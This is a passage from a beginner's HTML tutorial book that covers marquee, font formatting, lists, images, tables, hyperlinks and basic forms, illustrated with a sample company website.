<title> Bengallery Info. Tech. (BIT) the leading web solution 

developer </title> 

</head> 

<body> 

<marquee behavior="scroll" align="left" direction="up" 

scrollamount="2" scrolldelay="10" onmouseover="this.stop()"  

onmouseout="this.start()" width="600" height="250"> 

 

<p> 

<b>About Web-based software</b> 

<br /> 

Unlike the desktop-based software, over the years the web-based 

software is quickly gaining popularity this is due to its 

outstanding features and benefits, which include: 

<br /> 

<b>System Independent</b>: as compare to desktop-based software, 

end-users  need not to worry about the operating system or other 

hardware support when  using web-based software because all that is 

required to use web-based software  is only a web browser which can 

be found on almost every computer and can even  downloaded for free 

on the internet.<br /> 

<br /> 

<b>Central data management:</b> in a scenario where data migration 

and  management is essential or where more than one user need to 

update and make use  of a data from a single source, no doubt web-

based software out shine its  desktop counterpart also. 

<br /> 
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<b>Solution upgrading: </b>Web-based software makes it easy to 

update the entire solution from one source (central server) while in 

the case of desktop software you will need to install the update on 

every computer that uses the solution.<br /> 

<br /> 

<b>Security of data: </b> Web-based software often makes it possible 

to host your database on a separate computer (central server) 

different from the end-user computer therefore reducing the risk of 

security threat on data. 

<br /> 

<b>Concurrent user access :</b> web-based software can be access by 

more than one user at a time.  

</p> 

   

</marquee> 

</body> 

</html> 

 

The screenshot below is illustrated to show you what this looks like, but you need to implement the 

code to see the effect better. 
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I’ve tried to explain the core path of the code here. 

<marquee behavior="scroll" align="left" direction="up" 

scrollamount="2" scrolldelay="10" onmouseover="this.stop()"  

onmouseout="this.start()" width="600" height="250"> 

 

onmouseover="this.stop()" this simply tell the browser (e.g. Internet explorer) to stop or 

pause the marquee, while onmouseout="this.start()" does the opposite, that is for the 

scrolling to continue and  width="600" height="250" specify the space the marquee will occupy in 

pixels. 

Marquee can be of great importance when you need to: 

- To draw the website visitor’s attention to the text or images contain within it. 

- To display a lot of information within a limited or small space. 

Note: in as much as marquee is cool to use, you must try to avoid packing too many images within 

the marquee as it can slow down the downloading time as the user browse your website. 

Text Formatting 
Formatting webpage is probably the most visible part of web design; in this chapter we will learn 

text formatting.  
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We can change face (font style) and size of fonts using <FONT>...</FONT> tags by setting the 

respective parameters (attribute) of this tag. 

Font size 

To change size of font in a part of text, enclose it with a <FONT> tag as below: 

<FONT SIZE=7>This text will be big</FONT> 

You can change the “7” size of font. Size of font must be a number between 1 and 7. If you insert 

some text without determining its size default size will be 3. 

<HTML> 

<HEAD> 

<title> Bengallery Info. Tech. (BIT) the leading web solution 

developer </title> 

</HEAD> 

<BODY> 

<FONT SIZE=1>very small</FONT><br> 

<FONT SIZE=2>still small</FONT><br> 

<FONT SIZE=3>normal size</FONT><br> 

<FONT SIZE=4>getting big</FONT><br> 

<FONT SIZE=5> getting bigger </FONT><br> 

<FONT SIZE=6>and bigger</FONT><br> 

<FONT SIZE=7>Wow! The biggest</FONT><br> 

</BODY> 

</HTML> 
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The font size screenshot 

 

Font style or face 

Let’s now see how we can use a font to set the style or face for a text. 

<FONT FACE="Font Name Here">...</FONT> 

You must add font name in double quotes as we have in the above line. 

The code below shows an example.  

<HTML> 

<HEAD> 

<title> Bengallery Info. Tech. </title> 

</HEAD> 

<BODY> 

<FONT FACE="ARIAL">This is a popular font</FONT><br> 

<FONT FACE="IMPACT">This text is in IMPACT font</FONT><br> 

</BODY> 

</HTML> 
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Below is the preview 

 

 

Note: if the fonts type you use for the FACE this not take effect, try to check the correct spelling of 

the type and if you are certain about this and it still did not take effect then it is possible that the 

specified font is not installed on your computer.  

So be careful while using new fonts. It's better to use popular and readable fonts in your design.  

Alternatively you can use several font faces for each part of your text. In this way your browser will 

try alternative fonts if it could not find the primary one, see the line below for an example. 

<FONT Face="Arial,HELVATICA">...</FONT> 

 

Font color 

Colour no doubt can be pleasant to the eyes and can make your website beautiful, but as a fine artist 

I will advise you to apply colors properly. Below are some tips: 

No color riot: newbie to web design, are tempted to use almost all colours in their design and this is 

not professional. You are not supposed to use more than four colors in your design.  
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Color complementation: apart from the number of color, try to use colors that complement each 

other so that users can easily different the other text from each other for example, red is a 

compliment to green or better still black.  

Visible colors: color visibility is very important in design, because some people a actually color blind 

in order not to surfer your web visitor avoid using a light font color of text on a light colored 

background, for example never use a yellow font color on a white background, because the visibly 

with be awful, but same yellow font color would be perfect if use on a black background. 

Color usage: know who you client is and the purpose of the website, for example it could be 

ridiculous to use a pink font color of text for a own website that belongs to a law firm, while the 

same color could be perfect for a children game website.  

Finally avoid too flashy or bright color such as raw blue or pink colors for a background, if you have 

to use any of such color you should consider tinting (making it light) or shading (making it darker).  

Meanwhile if you’re really confuse about this whole color thing I think it would be better it you settle 

for a white background and a black text, as you can see almost every major website such as Google, 

Yahoo, Facebook etc. uses this combinations because it is more readable.    

 

Let’s take a quick look at how to apply a font color below: 

<HTML> 

<HEAD> 

<TITLE> Bengallery Info. Tech. </TITLE> 

</HEAD> 

<BODY> 

<FONT COLOR="#FF0000">This text is in red color.</FONT><br> 

<FONT COLOR="#00FF00">This text is in green color.</FONT><br> 

<FONT COLOR="#0000FF">This text is in blue color.</FONT><br> 

</BODY> 

</HTML> 

 

In the above example different colors are used. You can change text color by changing color number.  
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Combining Font attributes 

It is likely you may want to apply FONT SIZE, COLOR and FACE all to a particular text, your can do so 

by combining all this <FONT> tag parameter or attribute. In this way we will be able to have text with 

different colors, font faces and font sizes. 

 

<HTML> 

<HEAD> 

<TITLE> Bengallery Info. Tech. </TITLE> 

</HEAD> 

<BODY> 

<FONT SIZE="7" FACE="IMPACT" COLOR="#00FF00"> 

Welcome to my website. 

</FONT> 

</BODY> 

</HTML> 

 

Listing items and Horizontal rule 
 

Listing items 

In the section we will learn how to list items in a web page, using HTML.  

HTML provides you with Unordered List <UL> and Ordered List <OL> tags. 

Below example display item using an Unordered List 

 

<HTML> 

<HEAD> 

<TITLE> Bengallery Info. Tech. </TITLE> 
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</HEAD> 

<BODY> 

Here are some common programming languages: 

<UL> 

<LI> C++ </LI> 

<LI> JAVA </LI> 

<LI> VISUAL BASIC </LI> 

<LI> PHP </LI> 

</UL> 

</BODY> 

</HTML> 

 

The preview of the page (above) display the listed items in separate lines using a bullet symbol, this 

is what Unordered means; it means using symbols to list instead of number or alphabets. In the code 

above we entered the listed items within the <LI> (List Item) tag between Unordered List <UL></UL> 

tag. 

If you want the items to start with numbers instead of bullets, you must simply replace the 

<UL></UL> with the Ordered List <OL></OL> tag. See the example below.  

<UL> 

<LI> C++ </LI> 

<LI> JAVA </LI> 

<LI> VISUAL BASIC </LI> 

<LI> PHP </LI> 

</UL> 
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Nested list 

Nested list is just as it sound, it’s simply having another list item inside another; like a sub list, see 

the screenshot below. 

 

 

Below is the code that generates it. 

<HTML> 

<HEAD> 

<TITLE> Bengallery Info. Tech. </TITLE> 

</HEAD> 

<BODY> 

Continents and countries: 

<OL> 
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<LI>Africa 

 <OL> 

  <LI> Nigeria </LI> 

  <LI> Kenya </LI> 

  <LI> South Africa </LI> 

 </OL> 

</LI>  

<LI>Europe 

<OL> 

  <LI> England </LI> 

  <LI> France </LI> 

  <LI> Germany </LI> 

 </OL> 

</LI> 

<LI>Asia 

<OL> 

  <LI> China </LI> 

  <LI> Japan </LI> 

  <LI> India </LI> 

 </OL> 

</LI> 

</OL> 

</BODY> 

</HTML> 

I believe the HTML tag is simple enough, because I purposely indent my line of code using the tab 

key to move the items e.g. <LI>Nigeria </LI> inward for code better readability. This code uses 

nested countries inside continents using ordered lists. 

 

Horizontal Separator Rule 
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Another useful html function that you might be interested in is the horizontal line <HR> tag, this tag 

introduce a line which might be good to separate content in your webpage. See the screenshot 

below. 

 

 

The code for the screenshot page above 

<HTML> 

<HEAD> 

<TITLE> Bengallery Info. Tech. </TITLE> 

</HEAD> 

<BODY> 

First content 

<HR> 

Second content 

<HR> 

Third content 

</BODY> 

</HTML> 

 

As you can see the preview resulted in two horizontal lines separating three text lines or content. 

You can modify the properties for <HR>. 

You can also reduce the WIDTH of the line, either in percent <HR WIDTH="50%"> or pixels 

<HR WIDTH="100"> 

For example, I reduce the first <HR> by 50% 

<BODY> 
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First content 

<HR WIDTH="50%">  

Second content 

<HR> 

Third content 

</BODY> 

And this is what the preview looks like. 

 

I purposely do this, so that I can let you know that whenever you adjust the width of <HR>, it may 

be apparent that you will also need some alignment, because the default alignment is center, so the 

code segment shows how we can align the <HR> to LEFT or any of the three positions 

<BODY> 

First content 

<HR WIDTH="50%" ALIGN="LEFT">  

Second content 

<HR> 

Third content 

</BODY> 
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You can adjust line thickness using SIZE. 

<HR size=”5”> 

You can also determine the color of your <HR> line 

<HR color="#FF0000"> 

In the example below I thicken the line (SIZE) of the second <HR> to 5 and also change the COLOR to 

red. 

 

<HTML> 

<HEAD> 

<TITLE> Bengallery Info. Tech. </TITLE> 

</HEAD> 

<BODY> 

First content 

<HR WIDTH="50%" ALIGN="LEFT">  

Second content 

<HR color="#FF0000" size=5> 

Third content 

</BODY> 

</HTML> 

 

And the preview 
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Images 
 

Images or pictures no doubt bring live and beauty to web experience, so we will be learning how to 

add pictures or images into our web page. 

 

Images in your web page 

First the name of the image file is welcome.jpg the image file type or extension common with 

website includes .JPG or JPEG, .GIF and .BMP If you are using a graphics application such as 

Photoshop or Fireworks (we will cover Fireworks letter in this book) It is expected to optimize your 

image to suit web environment. This means that you should not only have a quality picture or 

graphics but also ensure that the pictures size and attribute is best for website.  

 

Welcome.jpg 

 

For example when I took the photo shot of this artwork using my mobile phone the width / height is 

about 1200 by 1000px (pixels) making the size to be about 3MB, which is above 3000KB (if converted 

to kilobyte), because 1MB(MegaByte) is equivalent to 1024KB(KiloByte). Before I optimize it using 

Fireworks by reduce its width / height to 500 by 375PX makings its size to be 64.1KB; what this 

means is that you should not be tempted to snap and use a picture without watching its size, if the 

image size is big it will cause the web page to load slowly because the downloading time will be 

much and one thing that website visitors don’t like is to wait for a page to load, beside this will also 

consume more byte (which means money) from those browsing your website using a mobile phone. 

So by optimizing the picture the image will load faster. 

Now we will learn how to add an image to a web page using the <IMG> tag, 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

50 

 

I advice you put your images inside a separate folder on your website, so that it is separated from 

web pages. For this example I have my picture in folder name “image” inside my website; shown 

below is a collapse or tree view of what I have in Dreamweaver. 

 

Then I specify the picture path; that is, the folder “images” a slash then the name of the picture 

“welcome.jpg” as we have below. 

<HTML> 

<HEAD> 

<TITLE> Bengallery Info. Tech. </TITLE> 

</HEAD> 

<BODY> 

<B>This is an image :</B> 

<BR /> 

<IMG SRC="images/welcome.jpg"> 

</BODY> 

</HTML> 

 

The preview  
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You can use the WIDTH and HEIGHT attribute the alter the size of your images on the webpage, 

however this does not have effect of the physical picture or image file, as this attributes only have 

effect on the web front only. 

The example below shows how I change the WIDTH and HEIGHT of the picture in the second <IMG> 

tag. 

 

<BODY> 

<B>This is an image :</B> 

<BR /> 

<IMG SRC="images/welcome.jpg"> 

<BR /><BR /> 

Below image size is adjusted 

<BR /> 

<IMG SRC="images/welcome.jpg" WIDTH=300 HEIGHT=100> 

</BODY> 

 

The preview 

 

 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

52 

 

It’s quite common that when you set the WIDTH and HEIGHT of image it may appear distorted, (as 

we have in the second picture, above) because both sides are not adjusted proportionally.  

If you are facing this kind of challenge I will advise you to set only the WIDTH or only the HEIGHT, for 

the second image I remove the HEIGHT attribute leaving only WIDTH to achieve a balance 

proportion. 

 

... 
Below image size is adjusted 
<BR /> 

<IMG SRC="images/welcome.jpg" WIDTH=300> 

</BODY> 

 

See the preview (Now), compare to the former (Before) 

 

 

 

Alignment for images 

You can align image in your web page by inclosing it in a paragraph that aligned, then you set the 

paragraph to align to left, right or center, although <IMG> has a ALIGN attribute, but I don’t found it 

as flexible as paragraph alignment. For example below I align the second image (along with its 

heading text) to the center using a paragraph. 

 

<BODY> 

<B>This is an image :</B> 

<BR /> 

<IMG SRC="images/welcome.jpg" align="middle"> 

<BR /> 

<BR /> 

<P ALIGN="CENTER"> 

Below image size is adjusted  

<BR /> 

<IMG SRC="images/welcome.jpg" WIDTH=300> 

</P> 

</BODY> 
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The preview 

 

 

 

Alternative text for images 

According to W3C standard every image in your web page should have an alternative text; in order 

to conform to the accessibility standard for people with disability, most especially the visually 

impaired, surfing your web page with a text reading device; beside some web surfers may turn off 

images support on their browser, In order to carry this set of users along, the alternative text of an 

image on your web page will appear in the place in the place of the picture so this users can read or 

hear the text equivalent of the picture. 

To add the alternative text, just add an ALT parameter to <IMG> tag. Below I added an ALT text to 

the second image from our last project. 

... 

<P ALIGN="CENTER"> 

Below image size is adjusted  

<BR /> 

<IMG SRC="images/welcom.jpg" WIDTH=300 ALT="The second art picture"> 

</P> 

</BODY> 
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When you do this it may not have any visible effect on the picture, but the benefit of the ALT text is 

that it can appear as a tooltip in a browser such as Microsoft Internet Explorer, when you move your 

mouse pointer to it, and wait. See the screenshot below  

 

 

The ALT text appears can also appear whenever the image or picture is unable to load, either due to 

bad internet connect connection, browser image is turn off, mistake in the image name or path (as I 

purposely did here by changing the name of the picture from welcome.jpg to welcom.jpg ) or when 

the picture is not available.  

See the preview in Internet Explorer. Note it may appear quite differently in other browsers.  

 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

55 

 

 

Accessing Image from different locations 

In the last image examples, the image file or picture is residing in an images folder in the same folder 

where the html file is located. What If our image file resides in another directory outside or website 

(although this is not advisable), but in case we found ourselves here, then we must specify the full 

relational path or a complete URL to where the image is located, for example the line of code below 

specify how I reference an image in My Document of my computer 

<IMG SRC="file:///C:/Users/USER/Documents/music_and_color.jpg"> 

 

Please note also that I use underscore instead of space in the image name “music_and_color.jpg” 

rather than “music and color.jpg” it is advisable to name this file this way so as not to create 

confusion. 

 

 

Similarly you can reference an image from another website if you know the correct address or path 

to that image on that website. For example 

 

<IMG SRC="http://nemsacademy.com/images/logo.png"> 

 This will map to our logo on NEMSacademy.com 

 

 

What if your webpage is in another folder for example “user” and you need to access the picture in 

the "images" folder, (both within your website)? See the illustrated structure below 
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You add the picture to the webpage, by referencing the path using the directory or folder mapping 

“../” see the line of code below.     

<IMG SRC="../images/welcome.jpg" align="middle"> 

 

Likewise, the more subdirectory or subfolder we have the more mapping; for example if index.html, 

is in two subdirectory down, for example user/manager/index.html. As we have in the screenshot 

below. 

 

Then we have to access the images from the user/manager/index.html using the line below. 

<IMG SRC="../../images/welcome.jpg" align="middle">  
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For now I believe we have covered some reasonable amount of image attributes and access, so we 

will be looking at table next. 

Tables 
Table is a matrix like object that is use holding or tabulating other objects such as text, images, 

buttons or another item in a structure manner. Even if you don't see them they are present in many 

web pages, use as a layout. We will learn about table layout later, for now let’s start with the basics 

of table.  

 

Creating a table 

To create a table in HTML we will use <TABLE> tag. We will also need three other related tags to 

give the table rows and columns, which are <TR> table rows, <TH> table heading and <TD> table 

data tags 

Note: <TH> and <TD> behave alike but the difference is that, <TH> as the name suggest; display 

the header text in bold font and align the text to the center. 

 

In the screenshot below, we have a table containing record of employee; the table has three (3) 

columns and five (5) rows including the table header. Note that column is vertical while row is 

horizontal. 

 

The HTML code for the table 

 

<HTML> 

<HEAD> 

<TITLE> Bengallery Info. Tech. </TITLE> 

</HEAD> 

<BODY> 

 

<B>EMPLOYEE RECORD</B> 

<BR /> 

 

<TABLE> 
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<!-- Table Header --> 

<TR> 

 <TH>ID</TH> 

 <TH>NAME</TH> 

 <TH>POST</TH> 

</TR> 

 

 

<!-- Record 1 --> 

<TR> 

 <TD>001</TD> 

 <TD>Femi Kunle</TD> 

 <TD>Accountant</TD> 

</TR> 

 

<!-- Record 2 --> 

<TR> 

 <TD>002</TD> 

 <TD>Chukwu James</TD> 

 <TD>Enginneer</TD> 

</TR> 

 

<!-- Record 3 --> 

<TR> 

 <TD>003</TD> 

 <TD>Akeem Yusuf</TD> 

 <TD>Production</TD> 

</TR> 

 

<!-- Record 4 -->    

<TR> 

 <TD>004</TD> 

 <TD>Ejiro Blessing </TD> 

 <TD>Marketer</TD> 

</TR> 

 

</TABLE> 

 

</BODY> 

</HTML> 
 

As usual I indented and comment <!--  --> the code above to make it readable and self 

explaining. As you know comment is a non executable statement that the programmer uses to 

document or make the code to the reader by other programmer or anyone using the code. 

 

Table border 
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Border gives your table an outline, making it more visible. To make a table to have a border, you 

simply border attribute. For example I use <TABLE BORDER=1> to set the border to 1, if you did 

this to the last Employee record table example. 

... 

<B>EMPLOYEE RECORD</B> 

<BR /> 

<TABLE BORDER=1> 

 

<!-- Table Header --> 

<TR> 

 <TH>ID</TH> 

 <TH>NAME</TH> 

 <TH>POST</TH> 

… 

The preview will now look like what we have below. 

 

You set the border to 0 if you don’t want another border 1.  

 

Table width 

When we do not specify sizes for a table it will be stretched to fit the record, text or any other object 

that it hold. You can specify width for a table either in percent <TABLE WIDTH="50%"> or in 

pixels <TABLE WIDTH="300px">.  

Continuing with our example, I set with to 50 percent (that is strength to 50% of the browser 

window). 

... 

<TABLE BORDER=1 WIDTH="50%"> 

<!-- Table Header --> 

<TR> 

 <TH>ID</TH> 

 <TH>NAME</TH>  

… 

And the preview 
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Table and Data alignment  

To align a table to either of the three position, that is left, center or right (left is the default 

position), you use the align property of the table <TABLE ALIGN="CENTER">. The code segment 

below aligns the Employee sample table to the center.  

... 

<TABLE BORDER=1 WIDTH="50%" ALIGN="CENTER"> 

<!-- Table Header --> 

<TR> 

 <TH>ID</TH> 

 <TH>NAME</TH>  

… 

The preview 

 

Likewise you can set align for Table rows <TR ALIGN=”RIGHT”> and Table data <TD 

ALIGN=”CENTER”>, for example to align “Chukwu James” record to center. I use the code below. 

<!-- Record 2 --> 

<TR ALIGN="CENTER"> 

 <TD>002</TD> 

 <TD>Chukwu James</TD> 

 <TD>Enginneer</TD> 

</TR> 

The preview 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

61 

 

 

 

Similarly to align just a data in a cell <TD ALIGN=”position”>, for example I want to align the 

data “Accounting” to the right I use the code below 

<!-- Record 1 --> 

<TR> 

 <TD>001</TD> 

 <TD>Femi Kunle</TD> 

 <TD ALIGN="CENTER">Accountant</TD> 

</TR> 

The preview  

 

 

You can also alignment a text in a cell vertically, but to see the effect of this we must first increase 

the height of the row.  

 

Row Height  

To increase the height of a table row, I set the HEIGHT attribute of every cells of that row. See how I 

applied it to the heading of the Employee record table, below. 

<TABLE BORDER=1 WIDTH="50%" ALIGN="CENTER"> 

... 

<!-- Table Header --> 

<TR> 

 <TH height="100px">ID</TH> 
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 <TH height="100px">NAME</TH> 

 <TH height="100px">POST</TH> 

</TR> 

... 

 Note: You can set the height for <TD> just as we did for <TH>, se setting the height of the table 

heading to 100px should result to what we have below. 

 

  

Now that we have set the height for the cell we will be able to see the effect of a vertical alignment 

when we apply it to the heading of the Employee sample table. 

 

Note: just as you set height for a cell you can also set a height for an entire table, for example 

<TABLE BORDER=1 WIDTH="50%" height="400px">  

or for a row, for example <TR height="100px">  

 

Vertical alignment 

To do this we add and set the VALIGN attribute of the <TH> or <TD> tag to either TOP, BOTTOM or 

MIDDLE. Note that the default position is the MIDDLE; in the example below I align the Name 

heading to the top. 

<!-- Table Header --> 

<TR> 

 <TH height="100px">ID</TH> 

 <TH height="100px" valign="top">NAME</TH> 

 <TH height="100px">POST</TH> 

</TR> 

And the browser view will look like this. 
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Table background color 

We can use background color for table as a whole, or its individual rows or cell.  

To set background color for the entire table we add the BGCOLOR attribute to the <TABLE> tag, 

that is <TABLE BGCOLOR=”colour name e.g yellow or code”>, see example below 

… 

<TABLE BORDER=1 WIDTH="50%" ALIGN="CENTER" BGCOLOR="#CCCCCC"> 

<!-- Table Header --> 

<TR> 

 <TH>ID</TH> 

 <TH>NAME</TH> 

 <TH>POST</TH> 

</TR> 

<!-- Record 1 --> 

<TR height="100px"> 

 <TD>001</TD> 

 <TD>Femi Kunle</TD> 

 <TD>Accountant</TD> 

</TR> 

<!-- Record 2 --> 

<TR> 

 <TD>002</TD> 

 <TD>Chukwu James</TD> 

 <TD>Enginneer</TD> 

</TR> 

</TABLE> 

... 

The example above will change the background of the table to grey. See the browser view below.  
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Similarly for individual rows or cells background colour we add the BGCOLOR attribute to the row 

<TR> tag or cell <TD> tag. That is <TR BGCOLOR=”colour name e.g yellow or code”> for 

row and <TD BGCOLOR=”colour name e.g yellow or code”> for cell.  

In the example below, we add yellow background to first row (record 1), and lemon background to a 

cell with the text “Engineer” in the second row (record 2). 

 

<!-- Record 1 --> 

<TR BGCOLOR="yellow"> 

 <TD>001</TD> 

 <TD>Femi Kunle</TD> 

 <TD>Accountant</TD> 

</TR> 

<!-- Record 2 --> 

<TR> 

 <TD>002</TD> 

 <TD>Chukwu James</TD> 

 <TD BGCOLOR="#99FF00">Enginneer</TD> 

</TR> 

The browser view 

 

 

Table columnspan and rowspan 

Sometimes you need to merge two or more cells of columns or rows together, this is very common 

when you’re using table to layout or structure your web page.  
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For example in a 2 by 3 table we may want to merge the three cells of the first rows together using 

<TD COLSPAN=”3”> In this way we will have one (merged) cell in first row and three cells in 

second row. See the view below. 

 

 

I will like us to create a new website “myweb” for this exercise and practice with all that we have 

learnt while using a table for the layout. Start by creating a folder name “myweb”; open the folder 

and create another folder inside it called “images”. The structure should look like the one below: 

  

Copy any picture from your computer, paste it inside the “images” folder and rename the image file 

to “banner”; In my case I use the companies banner image. 

   

Then create your homepage “index.htm”, inside the “myweb” folder. 

 

Open the “index.htm” file and have the code below inside it. 
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Index.htm 

<HTML> 

<HEAD> 

<TITLE>Welcome to BICL website</TITLE> 

</HEAD> 

<BODY> 

<TABLE WIDTH="50" BORDER=0 align="center"> 

<TR> 

<TD COLSPAN=3> 

<IMG SRC="images/banner.jpg"> 

</TD> 

</TR> 

<TR height="300px"> 

  <TD width="14%" VALIGN=TOP BGCOLOR="#FFFF99"> 

<b>MY LINK</b> <br /> 

Home <br /> 

Contact <br /> 

About Us</TD> 

  <TD width="67%" VALIGN=TOP><b>WELCOME</b> 

     <p> BICL is a leading IT company. 

Our Goal is to empower people and organizations with 

technology. 

And we aim to deliver to you a rich, quality and functional IT 

services, solutions and products, promptly at an affordable 

price.  

  </TD> 

  <TD width="19%" VALIGN=TOP bgcolor="#FFFF99"> 

<b>EMAILS</b> <br /> 

bicl@bengallery.com <br /> 

Benjamin.onuorah@gmail.com 

  </TD> 

</TR> 

<TR> 

  <TD colspan="3" align="center" BGCOLOR="#FFFF99"> 

Copyright (2014) Bengallery Integrated Company Ltd.  
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All rights reserved. 

  </TD> 

</TR> 

</TABLE> 

</BODY> 

</HTML> 

And the browser view looks like what I have below. 

 

 

The code may look a bit more complex, this is because I drew from previous exercise what we have 

learnt in previous chapters, I try to indent the code as usual to make it easy to understand, the table 

has three columns and three rows, I merge the top and bottom rows to make room for the header 

and footer of the webpage, where we have the banner.jpg and the footer where we have the 

copyright text, the middle row maintains its three columns containing “MY LINK” text (we will link 

this text in the next exercise) the “WELCOME” message in the center column and the “EMAILS” at 

the right column  respectively. 

 

         

Linking your web pages 
One of the fascinating things about the web experience is the linking (hyperlink) between pages. In 

this chapter we shall learn about hyperlinks. 
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Any object such as text, graphic images can be use as a link for navigating between web pages. Links 

can point to a page on our site or to a web page on another site. 

The syntax for hyperlink is <A HREF=”URL linking to”>Link Object</A>  

For example <A HREF=”contact.htm”>Contact</A>  

 

We shall continue with the last website “myweb” we will start by creating two more pages, 

contact.htm and about_us.htm, then we will link to these pages and vice versa.   

 

 

To maintain consistency and ease we will use the index.htm to create these two pages, by copying 

and pasting it and renaming the copied file, to do this you can simply select the index.htm file and 

use the short-cut, Ctrl+C to copy it, then Ctrl+V to paste it OR you use the simple steps below. 

 

Step1. Open the website myweb 

 

 

Step2. Right-click on the “index.htm” and click “copy” from the menu displayed, to copy the file 
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Step3. Right-click on the empty space within the “myweb” open window, and click “paste” from the 

menu displayed 

 

 

Immediately this is done we should have the pasted copy as we have below. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

70 

 

 

 

Now we have a new webpage so let’s rename it to “about_us.htm” to do this: 

Step1. Right-click on the copied index page and click “rename” from the menu displayed 

 

The file should be in rename mode as we have below 

 

 

So type in the new name about_us and deselect, by clicking at the empty window. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

71 

 

 

 

Don’t forget that this new page contains the content of the index.htm, from which it was created 

from, so we need to edit its content, so open the webpage about_us.htm with your editor and edits 

the WELCOME section only, it should now look like the code below.  

 

about_us.htm 

<HTML> 

<HEAD> 

<TITLE>Welcome to BICL website</TITLE> 

</HEAD> 

<BODY> 

<TABLE WIDTH="50" BORDER=0 align="center"> 

<TR> 

<TD COLSPAN=3> 

<IMG SRC="images/banner.jpg"> 

</TD> 

</TR> 

<TR height="300px"> 

  <TD width="14%" VALIGN=TOP BGCOLOR="#FFFF99"> 

<b>MY LINK</b> <br /> 

Home <br /> 

Contact <br /> 

About Us</TD> 

  <TD width="67%" VALIGN=TOP><b>ABOUT US</b> 

     <p>  

  This should contain information about the company   

  </TD> 

  <TD width="19%" VALIGN=TOP bgcolor="#FFFF99"> 

<b>EMAILS</b> <br /> 
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bicl@bengallery.com <br /> 

Benjamin.onuorah@gmail.com 

  </TD> 

</TR> 

<TR> 

  <TD colspan="3" align="center" BGCOLOR="#FFFF99"> 

Copyright (2014) Bengallery Integrated Company Ltd.  

All rights reserved. 

  </TD> 

</TR> 

</TABLE> 

</BODY> 

</HTML> 

 

See the two bolded lines in the code are the lines I modified, just to make this page (about_us.htm) 

difference from the index.htm, see both page in the screenshots below. 
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Now create the contact page,, by similarly copying and pasting the about_us.htm, and rename the 

new page, to contact.htm, we should now have three pages 

 

And the contact.htm should be modified too, as we did below. 

 

contact.htm 

<HTML> 

<HEAD> 

<TITLE>Welcome to BICL website</TITLE> 

</HEAD> 

<BODY> 

<TABLE WIDTH="50" BORDER=0 align="center"> 

<TR> 

<TD COLSPAN=3> 

<IMG SRC="images/banner.jpg"> 
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</TD> 

</TR> 

<TR height="300px"> 

  <TD width="14%" VALIGN=TOP BGCOLOR="#FFFF99"> 

<b>MY LINK</b> <br /> 

Home <br /> 

Contact <br /> 

About Us</TD> 

  <TD width="67%" VALIGN=TOP><b>CONTACT US</b> 

     <p>  

   Feedback form will be here 

  </TD> 

  <TD width="19%" VALIGN=TOP bgcolor="#FFFF99"> 

<b>EMAILS</b> <br /> 

bicl@bengallery.com <br /> 

Benjamin.onuorah@gmail.com 

  </TD> 

</TR> 

<TR> 

  <TD colspan="3" align="center" BGCOLOR="#FFFF99"> 

Copyright (2014) Bengallery Integrated Company Ltd.  

All rights reserved. 

  </TD> 

</TR> 

</TABLE> 

</BODY> 

</HTML> 

 

Just like the about_us.htm, I simply edited two lines I bolded as seen above.  

Note: when we get to FORM in the next chapter we will put a Feedback form, in place of the text 

“Feedback form will be here” 

 

Below is screenshot of the contant.htm page 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

75 

 

 

 

Now that we have all the pages in place we can now link the pages, let’s start with index.htm page, 

we already have the page navigation section at the left “MY LINK” of every page, below is a closer 

look of this section on the index.htm   

 

To hyperlinked this three text (Home, Contact and About us) to their respective pages (index.htm, 

contact.htm and about_us.htm). 

 

Still in index.htm; I edit this HTML section…  

<TD width="14%" VALIGN=TOP BGCOLOR="#FFFF99"> 

<b>MY LINK</b> <br /> 

 Home <br /> 

 Contact <br /> 

 About Us 

</TD> 
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… By wrapping the hyperlink tag around the texts 

 

<TD width="14%" VALIGN=TOP BGCOLOR="#FFFF99"><b>MY LINK</b> <br /> 

<a href="index.htm">Home</a><br /> 

<a href="contact.htm">Contact</a><br /> 

<a href="about_us.htm">About Us</a>  

</TD> 

Back to the browser view 

 

Typically a link is underlined with blue colour for unvisited link and purple colour for visited link, 

however this can be alter with CSS, we will learn CSS later in this book. 

 

Note: this link is only present in the index.htm page, therefore when you click on the contact link 

from this index page, you will notice that the contact page navigations are not linked, so you need to 

link the navigations in contact.htm and about_us.htm pages as well, just as you did with the 

index.htm, this can be easy done by copying the already linked navigation (I am talking about the last 

code section above) in the index.htm to the other two pages  

 

 

Image links 

In previous exercise we used a text as a link point, as said earlier It is possible to use an image 

instead of text. To do this, you must replace link text in between hyperlink tag with <IMG> tag 

In this example we link the banner image to the home or index page from about_us.htm and 

contact.htm pages 

<TD COLSPAN=3> 

<a href="index.htm"><IMG SRC="images/banner.jpg"></a> 

</TD> 

 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

77 

 

Email links 

The email link makes it easy for a site visitor email you. 

Below I added the email link to one of the email address on the index page   

 

<TD width="19%" VALIGN=TOP bgcolor="#FFFF99"> 

<b>EMAILS</b> <br /> 

<A HREF="mailto:info@bengallery.com">info@bengallery.com </A> <br /> 

Benjamin.onuorah@gmail.com 

</TD> 

The browser view will look like what we have below. 

 

And when the user clicks on the info@bengallery.com link it opens the default email program and 

the email after the "mailto:" is use as the recipient email address, as show in the screenshot below. 
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Form 
 

Form is a very important component of the web, as the website become more interactive, it is very 

common to have a visitor complete a website feedback form and immediately the submit button is 

click the data supply by the user is sent to the company (that owns the website) email or even in a 

more structure and secure storage location such as a database. 

 

Although form is use for so much more, you can see the Google search engine, collect your search 

query via a web form to perform its search operation; besides this, the web is now use to build 

business or enterprise applications that really heavily on web forms. 

 

You use the <FORM> tag to create a form, although you will have to setting its ACTION and METHOD 

parameter. The lines of code below show a typical example of this. 

 

<FORM ACTION="enquiry.php" METHOD="POST"> 

</FORM> 

 

The METHOD parameter can either have a POST or GET value, but the common choice for a typical 

form with sensitive data and unlimited information is the POST method as the GET method data is 

attached to the address bar of your web browser. 

 

The ACTION parameter specify the page the form will be posting or submitting the data within the 

form to, in the example above it is “enquiry.php” page, typically this page will have a program that 

will carry out an operation using the data supplied to it.  

PHP will be explained later in this book.  

 

